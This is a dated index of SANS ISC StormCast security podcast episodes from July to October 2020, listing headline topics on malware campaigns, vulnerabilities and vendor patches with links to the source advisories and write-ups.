TA551/Shathak Word Docs Push IcedID and Bokbot https://isc.sans.edu/forums/diary/More+TA551+Shathak+Word+docs+push+IcedID+Bokbot/26674/
MSFT Patch Tuesday Followup https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
Apple T2 Chip Vulnerability Confirmed https://9to5mac.com/2020/10/13/t2-exploit-team/
SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
10/15/2020 (6 minutes)

ISC StormCast for Wednesday, October 14th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2020+Patch+Tuesday/26672/
Adobe Updates https://helpx.adobe.com/security/products/flash-player/apsb20-58.html
10/14/2020 (6 minutes, 37 seconds)

ISC StormCast for Tuesday, October 13th 2020

Nested .MSGs: Turtles All The Way Down https://isc.sans.edu/forums/diary/Nested+MSGs+Turtles+All+The+Way+Down/26668/
Microsoft Attempting To Take Down Trickbot C2 Infrastructure https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/
Google Chrome Cache Partitioning https://developers.google.com/web/updates/2020/10/http-cache-partitioning
10/13/2020 (5 minutes, 45 seconds)

ISC StormCast for Monday, October 12th 2020

Phishing Kits As Far As The Eye Can See https://isc.sans.edu/forums/diary/Phishing+kits+as+far+as+the+eye+can+see/26660/
Open Packaging Conventions https://isc.sans.edu/forums/diary/Open+Packaging+Conventions/26662/
Analyzing MSG Files https://isc.sans.edu/forums/diary/Analyzing+MSG+Files+With+pluginmsgsummary/26664/
Cisco Video Surveillance 8000 Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cdp-rcedos-mAHR8vNx
55 New Apple Flaws https://samcurry.net/hacking-apple/
10/12/2020 (5 minutes, 49 seconds)

ISC StormCast for Friday, October 9th 2020

Hashicorp Vault Vulnerabilities https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-hashicorp-vault.html
Ryuk Ransomware Writeup https://thedfirreport.com/2020/10/08/ryuks-return/
Ricky Tan: Zeek Log Reconnaissance with Network Graphs Using Maltego Casefile https://www.sans.org/reading-room/whitepapers/securityanalytics/zeek-log-reconnaissance-network-graphs-maltego-casefile-39815
10/9/2020 (19 minutes, 33 seconds)

ISC StormCast for Thursday, October 8th 2020

Today, Nobody is Going to Attack You https://isc.sans.edu/forums/diary/Today+Nobody+is+Going+to+Attack+You/26654/
Google Chrome Patches https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop.html
Android Security Update https://source.android.com/security/bulletin/2020-10-01
QNAP Patches Helpdesk Application https://www.qnap.com/en/security-advisory/QSA-20-08
Comcast Remote Control Eavesdropping https://www.guardicore.com/2020/10/wareztheremote-turning-remotes-into-listening-devices/
10/8/2020 (6 minutes, 51 seconds)

ISC StormCast for Wednesday, October 7th 2020

Apple T2 Chip Vulnerability https://ironpeak.be/blog/crouching-t2-hidden-danger/
NVIDIA Patches https://nvidia.custhelp.com/app/answers/detail/a_id/5075
Cloudflare DDoS Alerts https://blog.cloudflare.com/announcing-ddos-alerts/
Gravatar Privacy Issue https://www.bleepingcomputer.com/news/security/online-avatar-service-gravatar-allows-mass-collection-of-user-info/
10/7/2020 (8 minutes, 31 seconds)

ISC StormCast for Tuesday, October 6th 2020

Obfuscation and Repetition https://isc.sans.edu/forums/diary/Obfuscation+and+Repetition/26648/
Compromised UEFI Payload Found https://securelist.com/mosaicregressor/98849/
Privilege Escalation Flaw in All AntiVirus Products https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
Rapid7 SMTP "NICER" Report https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/
10/6/2020 (5 minutes, 51 seconds)

ISC StormCast for Monday, October 5th 2020

Analysis of a Phishing Kit https://isc.sans.edu/forums/diary/Analysis+of+a+Phishing+Kit/26634/
Hoaxcalls Botnet Scanning for Huawei Home Gateway https://isc.sans.edu/forums/diary/Scanning+for+SOHO+Routers/26638/
SQL Server Cumulative Update 8 https://support.microsoft.com/en-us/help/4577194/cumulative-update-8-for-sql-server-2019
Telstra Accidentally Reroutes Proton Mail Traffic https://protonmail.com/blog/bgp-hijacking-september-2020/
"Raccine" Ransomware Vaccine https://github.com/Neo23x0/Raccine
10/5/2020 (6 minutes, 24 seconds)

ISC StormCast for Friday, October 2nd 2020

Making Sense of Azure AD Activity Logs https://isc.sans.edu/forums/diary/Making+sense+of+Azure+AD+AAD+activity+logs/26626/
IOCs Turning into IOOIs https://isc.sans.edu/forums/diary/IOCs+turning+into+IOOIs/26624/
Apple Security Patch Pulled https://mrmacintosh.com/mojave-2020-005-security-update-causing-major-problems-updated
Have I Been EMOTET Service https://www.haveibeenemotet.com/
10/2/2020 (5 minutes, 19 seconds)

ISC StormCast for Thursday, October 1st 2020

Scans for FPURL.xml: Reconnaissance or Not? https://isc.sans.edu/forums/diary/Scans+for+FPURLxml+Reconnaissance+or+Not/26622/
HP Device Manager Backdoor https://support.hp.com/us-en/document/c06921908 https://www.theregister.com/2020/09/30/hp_device_manager_backdoor_database_account/
KensingtonWorks RCE https://robertheaton.com/another-rce-in-kensingtonworks/
10/1/2020 (6 minutes, 11 seconds)

ISC StormCast for Wednesday, September 30th 2020

Managing Remote Access for Contractors and Partners https://isc.sans.edu/forums/diary/Managing+Remote+Access+for+Partners+Contractors/26614/#comments Updated Windows ZeroLogon Advisory https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc Cisco Patching Exploited DoS Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz FoxIT PDF Reader Update https://www.foxitsoftware.com/support/security-bulletins.html
9/30/2020, 4 minutes, 58 seconds

ISC StormCast for Tuesday, September 29th 2020

Some Tyler Technologies Customers Targeted after Breach https://isc.sans.edu/forums/diary/Some+Tyler+Technologies+Customers+Targeted+with+The+Installation+of+a+Bomgar+Client/26610/ Obfuscated PowerShell Backdoor https://isc.sans.edu/forums/diary/PowerShell+Backdoor+Launched+from+a+ShellCode/26602/ QNAP Fixes AgeLocker Vulnerability in Photo Station https://www.qnap.com/de-de/security-advisory/qsa-20-06 TrendMicro Apex One Vulnerability https://success.trendmicro.com/product-support/apex-one
9/29/2020, 5 minutes, 35 seconds

ISC StormCast for Monday, September 28th 2020

Securing Exchange Online https://isc.sans.edu/forums/diary/Securing+Exchange+Online+Guest+Diary/26600/ Decoding Corrupt BASE64 https://isc.sans.edu/forums/diary/Decoding+Corrupt+BASE64+Strings/26606/ Fortinet VPN Default Setting Problem https://securingsam.com/breaching-the-fort/ Single Use Credit Card Numbers https://www.helpnetsecurity.com/2020/09/25/privacy-cards/
9/28/2020, 5 minutes, 39 seconds

ISC StormCast for Friday, September 25th 2020

Party in Ibiza with PowerShell https://isc.sans.edu/forums/diary/Party+in+Ibiza+with+PowerShell/26594/ Microsoft Tracking Zerologon Exploits https://twitter.com/MsftSecIntel/status/1308941504707063808 Apple Patches https://support.apple.com/en-us/HT201222 Instagram for Android Vulnerability https://blog.checkpoint.com/2020/09/24/instahack-how-researchers-were-able-to-take-over-the-instagram-app-using-a-malicious-image/
9/25/2020, 6 minutes, 3 seconds

ISC StormCast for Thursday, September 24th 2020

Dynamic Malicious Word Document https://isc.sans.edu/forums/diary/Malicious+Word+Document+with+Dynamic+Content/26590/ Old Versions of SAMBA Affected by ZeroLogon Vulnerability https://www.samba.org/samba/security/CVE-2020-1472.html Google Chrome Update https://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html QNAP Devices hit by AgeLocker Ransomware https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets-qnap-nas-devices-steals-data/
9/24/2020, 5 minutes, 35 seconds

ISC StormCast for Wednesday, September 23rd 2020

Citrix ADC Updates https://support.citrix.com/article/CTX281474 Firefox Version 81 Released https://www.mozilla.org/en-US/firefox/81.0/releasenotes/ Simple Scan Drops Ransomware Risk https://www.accesswire.com/607018/Corvus-Updates-Scan-Technology-with-RDP-Detection-Slashes-Ransomware-Claims-by-65 iOS 14 Jailbreak https://checkra.in/news/2020/09/iOS-14-announcement
9/23/2020, 5 minutes, 33 seconds

ISC StormCast for Tuesday, September 22nd 2020

Slightly Broken Overlay Phishing https://isc.sans.edu/forums/diary/Slightly+broken+overlay+phishing/26586/ MacOS Code Injection via Third Party Frameworks https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks Snort/ClamAV Cobalt Strike Detection https://blog.talosintelligence.com/2020/09/coverage-strikes-back-cobalt-strike-paper.html#more
9/22/2020, 6 minutes, 12 seconds

ISC StormCast for Monday, September 21st 2020

A Mix of Python and VBA in a Malicious Word Document https://isc.sans.edu/forums/diary/A+Mix+of+Python+VBA+in+a+Malicious+Word+Document/26578/ Salesforce Phish https://isc.sans.edu/forums/diary/Analysis+of+a+Salesforce+Phishing+Emails/26582/ Google App Engine Used in Phishing Attacks https://medium.com/@marcelx/attackers-are-abusing-googles-app-engine-to-circumvent-enterprise-security-solutions-again-eda8345d531d Sysmon Adds Clipboard Monitoring https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon Windows Defender No Longer Able to Download Files https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-windows-defender-ability-after-security-concerns/
9/21/2020, 5 minutes, 47 seconds

ISC StormCast for Friday, September 18th 2020

OSSEC Active Response https://isc.sans.edu/forums/diary/Suspicious+Endpoint+Containment+with+OSSEC/26576/ Microsoft Patch for Office for Mac https://docs.microsoft.com/en-us/officeupdates/release-notes-office-for-mac VMWare Fusion Vulnerability https://www.vmware.com/security/advisories/VMSA-2020-0020.html NSA Secure Boot Configuration Guide https://media.defense.gov/2020/Sep/15/2002497594/-1/-1/0/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF Microsoft Edge Warns Users of Adobe Flash End of Support https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/
9/18/2020, 5 minutes, 38 seconds

ISC StormCast for Thursday, September 17th 2020

Most Recent "Mirai" Bot Includes Code to Target Backups https://isc.sans.edu/forums/diary/Do+Vulnerabilities+Ever+Get+Old+Recent+Mirai+Variant+Scanning+for+20+Year+Old+Amanda+Version/26572/ Apple Security Updates https://support.apple.com/en-us/HT201222
9/17/2020, 5 minutes, 32 seconds

ISC StormCast for Wednesday, September 16th 2020

Traffic Analysis Quiz: Oh No... Another Infection https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Oh+No+Another+Infection/26566/ Magento 1 Stores Targeted By Recent Attack https://sansec.io/research/largest-magento-hack-to-date Adobe Media Encoder Patch https://helpx.adobe.com/security/products/media-encoder/apsb20-57.html Zerologon Reminder https://www.secura.com/pathtoimg.php?id=2055 Windows "Finger" Utility Abused http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
9/16/2020, 6 minutes, 20 seconds

ISC StormCast for Tuesday, September 15th 2020

Not Everything About ".well-known" is Well Known https://isc.sans.edu/forums/diary/Not+Everything+About+wellknown+is+Well+Known/26564/ BLE Lock Vulnerable to Replay Attack https://www.pentestpartners.com/security-blog/360lock-smart-lock-review/ Mobile Iron Exploit Released https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
9/15/2020, 5 minutes, 9 seconds

ISC StormCast for Monday, September 14th 2020

Pillaging and Protecting the Clipboard https://isc.sans.edu/forums/diary/Whats+in+Your+Clipboard+Pillaging+and+Protecting+the+Clipboard/26556/ Critical Vulnerability in PANOS https://security.paloaltonetworks.com/CVE-2020-2040 Linux VoIP Softswitch Malware https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/ CVE-2020-1472 Zerologon Privilege Escalation Vulnerability https://www.secura.com/blog/zero-logon
9/14/2020, 6 minutes, 22 seconds

ISC StormCast for Friday, September 11th 2020

Recent Dridex Activity https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/ Zoom Bombings and Zoom 2FA https://arxiv.org/abs/2009.03822 https://blog.zoom.us/secure-your-zoom-account-with-two-factor-authentication/ AMD Server CPUs May Be Locked to Particular Motherboard https://www.servethehome.com/amd-psb-vendor-locks-epyc-cpus-for-enhanced-security-at-a-cost/ BLURtooth Vulnerability https://www.bluetooth.com/learn-about-bluetooth/bluetooth-technology/bluetooth-security/blurtooth/
9/11/2020, 7 minutes, 40 seconds

ISC StormCast for Thursday, September 10th 2020

MacOS 11 Network Traffic https://isc.sans.edu/forums/diary/A+First+Look+at+macOS+11+Big+Sur+Network+Traffic+New+Now+with+more+GREASE/26548/ Azure Offers Automatic Windows VM Patching https://azure.microsoft.com/en-us/updates/automatic-vm-guest-patching-now-in-preview/ WeaveScope Used to Attack Docker Infrastructure https://www.intezer.com/blog/cloud-workload-protection/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/
9/10/2020, 5 minutes, 33 seconds

ISC StormCast for Wednesday, September 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2020+Patch+Tuesday/26544/ Adobe Security Bulletins https://helpx.adobe.com/security.html Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html
9/9/2020, 6 minutes, 36 seconds

ISC StormCast for Tuesday, September 8th 2020

A Blast From The Past: XXEncoded VB 6.0 Trojan https://isc.sans.edu/forums/diary/A+blast+from+the+past+XXEncoded+VB60+Trojan/26538/ Office: About OLE and ZIP Files https://isc.sans.edu/forums/diary/Office+About+OLE+and+ZIP+Files/26540/ Go XSS Vulnerability https://seclists.org/fulldisclosure/2020/Sep/5 "Baka" JavaScript Skimmer https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/visa-security-alert-baka-javascript-skimmer.pdf
9/8/2020, 5 minutes, 31 seconds

ISC StormCast for Friday, September 4th 2020

Sandbox Evasion Using NTP https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534/ Android DNS over HTTPS https://blog.chromium.org/2020/09/a-safer-and-more-private-browsing.html Cisco Jabber Vulnerability Followup https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
9/4/2020, 6 minutes, 12 seconds

ISC StormCast for Thursday, September 3rd 2020

Python and Risky Windows API Calls https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530/ QNAP Updates https://www.qnap.com/en/release-notes/qts/4.3.6.1411/20200825 https://www.qnap.com/en/release-notes/qts/4.4.3.1400/20200817 iOS 13.7 Update https://support.apple.com/en-us/HT201222 Cisco Jabber Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-UyTKCPGg MoFi Router Vulnerabilities https://www.criticalstart.com/critical-vulnerabilities-discovered-in-mofi-routers/
9/3/2020, 6 minutes, 18 seconds

ISC StormCast for Wednesday, September 2nd 2020

Exposed Domain Controllers Used in DDoS Attacks https://isc.sans.edu/forums/diary/Exposed+Windows+Domain+Controllers+Used+in+CLDAP+DDoS+Attacks/26526/ Microsoft Reviving SHA-1 https://techcommunity.microsoft.com/t5/microsoft-security-baselines/security-baseline-for-microsoft-edge-version-85/ba-p/1618585 Trend Micro Updating Anti Malware Products https://success.trendmicro.com/solution/000263632 Public Voter Data Sold as "Breach" https://www.cyberscoop.com/russia-hack-michigan-voter-data-kommersant/
9/2/2020, 6 minutes, 39 seconds

ISC StormCast for Tuesday, September 1st 2020

Finding The Original Maldoc https://isc.sans.edu/forums/diary/Finding+The+Original+Maldoc/26520/ Slack Remote Code Execution https://hackerone.com/reports/783877 Apple Approved Malware https://objective-see.com/blog/blog_0x4E.html Cisco IOS XR Bug Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz
9/1/2020, 5 minutes, 15 seconds

ISC StormCast for Monday, August 31st 2020

CenturyLink Outage https://blog.cloudflare.com/analysis-of-todays-centurylink-level-3-outage/ New Zealand Stock Market Denial of Service Attack https://www.theregister.com/2020/08/27/nzx_ddos_third_day/ Pulse Connect Secure RCE Patch https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/
8/31/2020, 7 minutes, 21 seconds

ISC StormCast for Friday, August 28th 2020

A Reminder about Security.txt https://isc.sans.edu/forums/diary/Securitytxt+one+small+file+for+an+admin+one+giant+help+to+a+security+researcher/26510/ DNS Queries to Root Name Servers https://blog.apnic.net/2020/08/21/chromiums-impact-on-root-dns-traffic/ https://www.zdnet.com/article/chromium-dns-hijacking-detection-accused-of-being-around-half-of-all-root-queries/ Microsoft Extends Windows 10 1803 Deadline https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet LemonDuck Adding New Tricks https://news.sophos.com/en-us/2020/08/25/lemon_duck-cryptominer-targets-cloud-apps-linux/
8/28/2020, 7 minutes, 9 seconds

ISC StormCast for Thursday, August 27th 2020

Malicious Excel Sheet with a NULL VT Score https://isc.sans.edu/forums/diary/Malicious+Excel+Sheet+with+a+NULL+VT+Score/26506/ APT Attack Uses Autodesk Plugin https://www.bitdefender.com/files/News/CaseStudies/study/365/Bitdefender-PR-Whitepaper-APTHackers-creat4740-en-EN-GenericUse.pdf Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-36/ Arrest in Insider Attack https://www.justice.gov/opa/press-release/file/1308766/download
8/27/2020, 5 minutes, 43 seconds

ISC StormCast for Wednesday, August 26th 2020

Keep an Eye on LOLBins https://isc.sans.edu/forums/diary/Keep+An+Eye+on+LOLBins/26502/ Malicious iOS Ad Network SDK https://snyk.io/research/sour-mint-malicious-sdk/ Apache Update https://httpd.apache.org/security/vulnerabilities_24.html Google Chrome User-Agent Client Hints https://web.dev/user-agent-client-hints/
8/26/2020, 5 minutes, 28 seconds

ISC StormCast for Tuesday, August 25th 2020

Tracking a Malware Campaign Through VT https://isc.sans.edu/forums/diary/Tracking+A+Malware+Campaign+Through+VT/26498/ Zoom Outage https://www.cnn.com/2020/08/24/us/zoom-outage-worldwide-trnd/index.html RDP Remains a Top Target https://www.group-ib.com/media/iran-cybercriminals/?utm_source=bleeping_computer&utm_medium=article&utm_campaign=referral Microsoft Introduces Application Guard https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide Safari File Sharing Bug https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html
8/25/2020, 5 minutes, 49 seconds

ISC StormCast for Monday, August 24th 2020

A Word of Caution: Helping Cyber Stalking Victims https://isc.sans.edu/forums/diary/A+Word+of+Caution+Helping+Out+People+Being+Stalked+Online/26422/ RDP and Telnet Scans https://isc.sans.edu/forums/diary/Remote+Desktop+TCP3389+and+Telnet+TCP23+What+might+they+have+in+Common/26492/ Thales Cinterion Input Validation Vulnerability https://www.thalesgroup.com/en/markets/digital-identity-and-security/iot/resources/security-updates-cinterion-iot-modules Google Drive File Extension Spoofing https://thehackernews.com/2020/08/google-drive-file-versions.html
8/24/2020, 6 minutes, 59 seconds

ISC StormCast for Friday, August 21st 2020

Office 365 Mail Forwarding Rules (and other Mail Rules too) https://isc.sans.edu/forums/diary/Office+365+Mail+Forwarding+Rules+and+other+Mail+Rules+too/26484/ Spoofing GMail/GSuite Customers https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/ Microsoft Updates DisableAntiSpyware Registry Key https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware Acoustic Based Physical Key Inference https://www.comp.nus.edu.sg/~junhan/papers/SpiKey_HotMobile20_CamReady.pdf
8/21/2020, 6 minutes, 35 seconds

ISC StormCast for Thursday, August 20th 2020

Example of a Word Document Delivering Qakbot https://isc.sans.edu/forums/diary/Example+of+Word+Document+Delivering+Qakbot/26482/ PGP/SMime Implementation Weaknesses https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2020/08/15/mailto-paper.pdf Windows 8.1 / 2012 Special Patch https://support.microsoft.com/en-us/help/4578013/security-update-for-windows-8-1-rt-8-1-and-server-2012-r2 Fileless Cryptomining Worm https://www.helpnetsecurity.com/2020/08/19/fileless-worm-p2p-botnet/
8/20/2020, 6 minutes, 20 seconds

ISC StormCast for Wednesday, August 19th 2020

Using APIs to Track Attackers https://isc.sans.edu/forums/diary/Using+APIs+to+Track+Attackers/26472/ Jenkins Security Advisory https://www.jenkins.io/security/advisory/2020-08-17/ Chrome Will Warn of Insecure Forms https://blog.chromium.org/2020/08/protecting-google-chrome-users-from.html Reminder: September 1st Certificate Expiration Change https://www.ssl.com/blogs/398-day-browser-limit-for-ssl-tls-certificates-begins-september-1-2020/ Cryptojacking Worm Steals AWS Credentials https://www.helpnetsecurity.com/2020/08/18/worm-steals-aws-credentials/
8/19/2020, 5 minutes, 34 seconds

ISC StormCast for Tuesday, August 18th 2020

Apache Struts Patch and PoC Exploit https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability https://cwiki.apache.org/confluence/display/WW/S2-059 Emotet Bug Used to Inoculate Systems https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/
8/18/2020, 5 minutes, 59 seconds

ISC StormCast for Monday, August 17th 2020

SANS Data Incident 2020 - Indicators of Compromise https://www.sans.org/blog/sans-data-incident-2020-indicators-of-compromise/ Large File Used to Obfuscate Malware https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/ Mac Malware Spreading via XCode https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf Citrix Broker Service Detected as Trojan by Windows Defender https://support.citrix.com/article/CTX279897
8/17/2020, 4 minutes, 37 seconds

ISC StormCast for Friday, August 14th 2020

Decrypting Voice over LTE Calls https://revolte-attack.net/ Vulnerabilities found on Amazon's Alexa https://research.checkpoint.com/2020/amazons-alexa-hacked/ DROVORUB Russian GRU Linux Malware https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
8/14/2020, 8 minutes, 27 seconds

ISC StormCast for Thursday, August 13th 2020

To the Brim at the Gates of Mordor https://isc.sans.edu/forums/diary/To+the+Brim+at+the+Gates+of+Mordor+Pt+1/26456/ Large Group of Malicious Tor Exit Nodes https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac SAP Updates https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552603345 Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html SANS Data Incident https://www.sans.org/dataincident2020
8/13/2020, 7 minutes, 18 seconds

ISC StormCast for Wednesday, August 12th 2020

vBulletin 0-Day Exploit https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2020+Patch+Tuesday/26452/ Adobe Patches https://helpx.adobe.com/security.html Citrix Endpoint Management Updates https://www.citrix.com/blogs/2020/08/11/citrix-provides-security-update-on-citrix-endpoint-management/
8/12/2020, 5 minutes, 29 seconds

ISC StormCast for Tuesday, August 11th 2020

Small Challenge: A Simple Word Maldoc (Solution) https://isc.sans.edu/forums/diary/Small+Challenge+A+Simple+Word+Maldoc+Part+2/26444/ Scoping Web Application Pentests https://isc.sans.edu/forums/diary/Scoping+web+application+and+web+service+penetration+tests/26448/ Problems With Chrome Extensions https://adguard.com/en/blog/fake-ad-blockers-part-3.html PDF Test Suite https://github.com/RUB-NDS/PDF101 https://raw.githubusercontent.com/RUB-NDS/PDF101/master/eval.png TeamViewer Update https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/m-p/99129
8/11/2020, 7 minutes, 6 seconds

ISC StormCast for Monday, August 10th 2020

Scanning Activity Against WIFICAM Using Netcat https://isc.sans.edu/forums/diary/Scanning+Activity+Include+Netcat+Listener/26442/ Qualcomm Snapdragon Vulnerabilities https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/ China Blocking TLS 1.3 and ESNI https://gfw.report/blog/gfw_esni_blocking/en/
8/10/2020, 7 minutes, 26 seconds

ISC StormCast for Friday, August 7th 2020

FTCode Ransomware Resurfaces https://isc.sans.edu/forums/diary/A+Fork+of+the+FTCode+Powershell+Ransomware/26434/ Microsoft Anti-Malware Flagging Hosts File Manipulation https://www.bleepingcomputer.com/news/microsoft/windows-10-hosts-file-blocking-telemetry-is-now-flagged-as-a-risk/ Reviving an Older Printer Vulnerability https://www.blackhat.com/us-20/briefings/schedule/#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685
8/7/2020, 5 minutes, 52 seconds

ISC StormCast for Thursday, August 6th 2020

Malware Analysis Quiz https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Whats+the+Malware+From+This+Infection/26430/ Exploiting CVE-2020-9854 on macOS https://objective-see.com/blog/blog_0x4D.html iOS OAuth2 Vulnerability https://www.computest.nl/en/knowledge-platform/blog/vulnerability-new-touchid-feature-iCloud-accounts-at-risk-breached/ Limiting Location Data Exposure https://media.defense.gov/2020/Aug/04/2002469874/-1/-1/0/CSI_LIMITING_LOCATION_DATA_EXPOSURE_FINAL.PDF
8/6/2020, 6 minutes, 28 seconds

ISC StormCast for Wednesday, August 5th 2020

A Reminder to Patch CVE-2020-3452. Active Exploitation Seen https://isc.sans.edu/forums/diary/Reminder+Patch+Cisco+ASA+FTD+Devices+CVE20203452+Exploitation+Continues/26426/ Internet Choke Points: Concentration of Authoritative Name Servers https://isc.sans.edu/forums/diary/Internet+Choke+Points+Concentration+of+Authoritative+Name+Servers/26428/ August Android Patches Released https://source.android.com/security/bulletin/2020-08-01 Possible New iOS Jailbreak Affecting Secure Enclave https://twitter.com/SparkZheng/status/1286599007834271744
8/5/2020, 6 minutes, 24 seconds

ISC StormCast for Tuesday, August 4th 2020

VBA Macro With Multiple Command and Control Channels https://isc.sans.edu/forums/diary/Powershell+Bot+with+Multiple+C2+Protocols/26420/ BootHole Patch Causes Unbootable Systems https://access.redhat.com/solutions/5272311 https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass#Recovery Disabling macOS TCC https://objective-see.com/blog/blog_0x4C.html CISA Publishes Details about Chinese Malware https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity
8/4/2020, 5 minutes, 48 seconds

ISC StormCast for Monday, August 3rd 2020

Pages Hit By Bad Bots https://isc.sans.edu/forums/diary/What+pages+do+bad+bots+look+for/26414/ KeePassRPC Vulnerability https://forum.kee.pm/t/a-critical-security-update-for-keepassrpc-is-available/3040 QNAP Updates Malware Remover https://www.bleepingcomputer.com/news/security/qnap-urges-users-to-update-malware-remover-after-qsnatch-alert/ Android Phone Updates https://www.theregister.com/2020/07/31/nearly_a_third_of_secondhand/
8/3/2020, 5 minutes, 29 seconds

ISC StormCast for Friday, July 31st 2020

Python Developers: Prepare! https://isc.sans.edu/forums/diary/Python+Developers+Prepare/26408/ Office 365 Phishing Hiding in Google Ads https://cofense.com/threat-actors-bypass-gateways-google-ad-redirects/ Zoom Brute Forcing Vulnerability https://www.tomanthony.co.uk/blog/zoom-security-exploit-crack-private-meeting-passwords/ Netgear Vulnerabilities https://www.kb.cert.org/vuls/id/576779 https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders OPNsense Update https://opnsense.org/opnsense-20-7/ Microsoft Retiring SHA1 https://techcommunity.microsoft.com/t5/windows-it-pro-blog/sha-1-windows-content-to-be-retired-august-3-2020/ba-p/1544373
7/31/2020, 5 minutes, 49 seconds

ISC StormCast for Thursday, July 30th 2020

Consumer VPNs: You May Be Fine Without It https://isc.sans.edu/forums/diary/Consumer+VPNs+You+May+Be+Fine+Without/26404/ Tails Update https://tails.boum.org/news/version_4.9/index.en.html Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-30/ Chrome Update https://chromereleases.googleblog.com/2020/07/stable-channel-update-for-desktop_27.html GRUB2 Vulnerability https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/ Facial Recognition With Masks https://nvlpubs.nist.gov/nistpubs/ir/2020/NIST.IR.8311.pdf
7/30/2020, 6 minutes, 8 seconds

ISC StormCast for Wednesday, July 29th 2020

New Datafeeds https://isc.sans.edu/forums/diary/All+I+want+this+Tuesday+More+Data/26400/ Emotet Stealing Email Attachments https://twitter.com/CofenseLabs/status/1288167724594671618 Magento Update https://helpx.adobe.com/security/products/magento/apsb20-47.html Exposed Docker Servers Infected with More Malware https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
7/29/2020, 6 minutes, 12 seconds

ISC StormCast for Tuesday, July 28th 2020

In Memory of Donald Smith https://isc.sans.edu/forums/diary/In+Memory+of+Donald+Smith/26396/ Analyzing Metasploit ASP .Net Payloads https://isc.sans.edu/forums/diary/Analyzing+Metasploit+ASP+NET+Payloads/26392/ Emotet Payloads Replaced with GIFs https://twitter.com/GossiTheDog/status/1286271503005290497 QNAP Devices Attacked https://us-cert.cisa.gov/ncas/alerts/aa20-209a
7/28/2020, 4 minutes, 38 seconds

ISC StormCast for Monday, July 27th 2020

